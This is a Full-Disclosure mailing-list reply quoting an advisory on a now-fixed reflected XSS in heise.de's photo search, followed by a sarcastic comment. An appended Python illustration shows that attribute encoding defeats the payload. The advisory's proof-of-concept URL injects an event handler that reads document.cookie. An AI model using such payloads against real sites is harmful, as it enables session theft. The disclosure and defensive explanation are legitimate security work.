On Thu, 10 Jan 2013 19:47:25 +0100 Stefan Schurtz <[email protected]> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Advisory: heise.de - Cross-site Scripting vulnerability
> Advisory ID: SSCHADV2013-002
> Author: Stefan Schurtz
> Affected Software: Successfully tested on heise.de
> Vendor URL: http://www.heise.de
> Vendor Status: fixed
>
> ==========================
> Vulnerability Description
> ==========================
>
> http://www.heise.de is prone to an XSS vulnerability
>
> ==========================
> PoC-Exploit
> ==========================
>
> http://www.heise.de/foto/galerie/suche/photo/?suchwort=" onMouseMove=alert(document.cookie) '
>
> ==========================
> Solution
> ==========================
>
> fixed
>
> ==========================
> Disclosure Timeline
> ==========================
>
> 03-Jan-2013 - informed heise Security
> 04-Jan-2012 - fixed by developer
>
> ==========================
> Credits
> ==========================
>
> Vulnerability found and advisory written by Stefan Schurtz.

Now that's valuable information. Thank god that you informed us about this groundbreaking issue, Stefan. I will update my personal heise.de right away.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
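The advisory quoted above reports a reflected XSS in the `suchwort` parameter but says nothing about the underlying defect or the fix. As an added illustration (not part of this thread, and not heise.de's code), the Python below assumes a hypothetical template that reflects the search term into a quoted HTML attribute, renders the advisory's own PoC value through an unencoded and an attribute-encoded version of that template, and checks whether the value can close the attribute. The template, field name and check are assumptions constructed for the example.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Constructed sample input: the PoC URL quoted in the advisory above.
POC_URL = ('http://www.heise.de/foto/galerie/suche/photo/'
           '?suchwort=" onMouseMove=alert(document.cookie) \'')

# Hypothetical template (assumption): the search term is reflected into a
# double-quoted attribute value of the search form's input element.
TEMPLATE = '<input type="text" name="suchwort" value="{term}">'

# The safe template contains exactly six double quotes; a raw '"' coming
# from user input would add a seventh and terminate the value attribute.
QUOTES_IN_SAFE_OUTPUT = TEMPLATE.count('"')


def get_suchwort(url):
    """Extract the suchwort query parameter the way a web framework would."""
    params = parse_qs(urlsplit(url).query)
    return params.get("suchwort", [""])[0]


def render_vulnerable(term):
    """Reflects the raw value: a '"' in the input breaks out of the attribute."""
    return TEMPLATE.format(term=term)


def render_fixed(term):
    """Attribute-context encoding: html.escape(quote=True) turns & < > " '
    into entities, so the value cannot end the attribute or start a new one."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


def breaks_out_of_attribute(rendered):
    """True if user input added an unencoded '"' that closes the attribute."""
    return rendered.count('"') != QUOTES_IN_SAFE_OUTPUT


if __name__ == "__main__":
    term = get_suchwort(POC_URL)
    print("vulnerable:", render_vulnerable(term),
          "->", breaks_out_of_attribute(render_vulnerable(term)))
    print("fixed:     ", render_fixed(term),
          "->", breaks_out_of_attribute(render_fixed(term)))
```

The point to take from the check is that the encoding has to match the output context: escaping only `<` and `>` would leave the `"` intact and the attribute would still be closed, so a reflected value inside an attribute needs quote encoding (and the attribute itself must be quoted in the template).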
